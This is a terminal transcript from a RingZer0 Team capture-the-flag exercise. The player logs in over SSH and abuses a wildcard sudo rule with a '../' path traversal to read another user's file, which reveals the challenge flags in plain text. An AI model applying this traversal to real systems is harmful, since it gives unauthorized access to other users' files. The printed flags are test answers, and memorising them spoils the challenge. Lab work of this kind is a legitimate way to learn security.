 ssh -p 13375 trinity@for01.ringzer0team.com 
trinity@for01.ringzer0team.com's password: Flag-08grILsn3ekqhDK7cKBV6ka8B

         _                             ____  __                     
   _____(_)___  ____ _____  ___  _____/ __ \/ /____  ____ _____ ___ 
  / ___/ / __ \/ __ `/_  / / _ \/ ___/ / / / __/ _ \/ __ `/ __ `__ \
 / /  / / / / / /_/ / / /_/  __/ /  / /_/ / /_/  __/ /_/ / / / / / /
/_/  /_/_/ /_/\__, / /___/\___/_/   \____/\__/\___/\__,_/_/ /_/ /_/ 
             /____/                                                 
                                      _ _             ___ _____ ___ 
                             ___ _ _ | (_)_ _  ___   / __|_   _| __|
                            / _ \ ' \| | | ' \/ -_) | (__  | | | _| 
                            \___/_||_|_|_|_||_\___|  \___| |_| |_|  
                                                                    

You have mail.
Last login: Thu Dec  8 17:33:14 2016 from 129.176.197.23
trinity@forensics:~$ ls -al
total 28
drwxr-xr-x  2 trinity trinity 4096 Mar 10  2014 .
drwxr-xr-x 10 root    root    4096 Jun 12  2014 ..
lrwxrwxrwx  1 root    root       9 Mar  9  2014 .bash_history -> /dev/null
-rwxr--r--  1 trinity trinity  236 Sep 21 18:00 .bash_logout
-rwxr--r--  1 trinity trinity 2638 Jul 19 06:37 .bashrc
-rw-r-----  1 neo     neo      124 Sep 20  2015 phonebook
-rwxr--r--  1 trinity trinity  675 Sep 23 11:15 .profile
-rwxr-----  1 trinity trinity   23 Jul  5 16:50 .vimrc
trinity@forensics:~$ sudo -l
[sudo] password for trinity: Flag-08grILsn3ekqhDK7cKBV6ka8B
Matching Defaults entries for trinity on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, insults

User trinity may run the following commands on this host:
    (neo) /bin/cat /home/trinity/*
trinity@forensics:~$ sudo -u neo /bin/cat /home/trinity/phonebook 
The Oracle        1800-133-7133
Persephone        345-555-1244





copy made by Cypher copy utility on /home/neo/phonebook

trinity@forensics:~$ sudo -u neo /bin/cat /home/trinity/../neo/phonebook
The Oracle        1800-133-7133
Persephone        345-555-1244




change my current password FLAG-lRGLKGh2895wIAoOvcBbgk4oL
don't forget to remove this :) 
